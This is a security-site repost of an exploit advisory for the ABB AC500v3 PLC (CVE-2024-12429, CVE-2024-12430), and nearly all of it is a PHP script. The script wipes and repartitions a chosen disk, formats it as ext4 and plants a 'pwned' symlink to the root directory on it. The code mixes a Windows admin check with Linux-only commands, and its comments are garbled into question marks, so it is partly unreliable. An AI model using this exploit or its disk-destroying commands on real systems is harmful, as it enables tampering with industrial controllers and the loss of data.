Latest Tech

Latest Posts

ABB AC500v3 3.7.0.569 Symlink Attack

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 206
ABB AC500v3 3.7.0.569 Symlink Attack
ABB AC500v3 3.7.0.569 Symlink Attack
=============================================================================================================================================
| # Title : ABB AC500v3 =============================================================================================================================================
| # Title : ABB AC500v3 3.7.0.569 Exploiting Symlink vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://global.abb/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Exploiting Symlink on ABB AC500 System Using PHP.

(Related : https://packetstorm.news/files/id/188713/ Related CVE numbers: CVE-2024-12429, CVE-2024-12430 ) .

[+] Usage : C:\www>php 2.php /dev/sdX

[+] PayLoad :

<?php

// indoushka
// abb ac500 symlink exploit

// ???? ??? ??? ???????? ?? ???? ???? (??? ?????) ?? ??? ???????
if ($argc != 2) {
echo "Usage: php abb_ac500_symlink.php /dev/sdX\n";
exit(1);
}

// ???? ??? ??? ???????? ???? ???????? ??????? ?? ??????
$isAdmin = (bool) shell_exec('NET SESSION');
if (!$isAdmin) {
echo "This script must be run as Administrator.\n";
exit(1);
}

$disk = $argv[1];
$part = $disk . "1";
$mountPoint = "/mnt/sdcard";
$symLinkTarget = "/";
$symLinkName = "pwned";

// ?????? ????? ????? ??????? ???????
exec("umount {$disk}* 2>/dev/null");

// ??? ???? ??????? ??????? ??? ?????
$fdiskCommands = "o\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");

// ????? ??? ???? ??? ?????
$fdiskCommands = "n\np\n1\n\n\nw\n";
file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands);
exec("fdisk {$disk} < /tmp/fdisk_commands.txt");

exec("partprobe {$disk}");

// ????? ????? ???????? ext4
exec("mkfs.ext4 -F {$part}");

// ????? ???? ?????? ???????
mkdir($mountPoint, 0777, true);

// ????? ?????
exec("mount {$part} {$mountPoint}");

// ????? ???? ????
symlink($symLinkTarget, "{$mountPoint}/{$symLinkName}");

// ??? ??????? ?????? ??? ????? ?????? ??????
exec("ls -l {$mountPoint}");

// ????? ????? ?????
exec("umount {$mountPoint}");

echo "Done.\n";



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.